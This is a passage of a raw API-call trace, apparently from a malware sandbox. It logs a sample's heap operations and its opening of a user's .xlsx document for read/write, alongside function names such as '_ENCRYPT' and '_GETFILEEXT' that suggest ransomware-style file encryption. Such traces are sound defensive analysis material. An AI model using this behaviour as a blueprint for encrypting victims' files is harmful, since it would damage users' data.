lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0032.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0032.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0032.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0032.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0032.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0032.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0032.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0032.572] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0032.572] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.572] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0032.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0032.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0032.572] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0032.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0032.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0032.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af468 [0032.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0032.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0032.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0032.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8896a0 [0032.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0032.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0032.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0032.573] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0032.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0032.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0032.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0032.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0032.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0032.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0032.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0032.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0032.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0032.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0032.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0032.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0032.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0032.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0032.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0032.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0032.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0032.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0032.575] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0032.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0032.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.577] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0032.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889550 [0032.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889550, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0032.577] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3xhpx7.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0032.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0032.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0032.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0032.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0032.578] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.578] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0032.578] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0032.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0032.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.578] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0032.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.578] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0032.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a60 [0032.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0032.578] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.578] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0032.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0032.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0032.578] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0032.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0032.579] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0032.579] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0032.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.579] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0032.579] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0032.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.580] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.580] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.580] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.580] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, 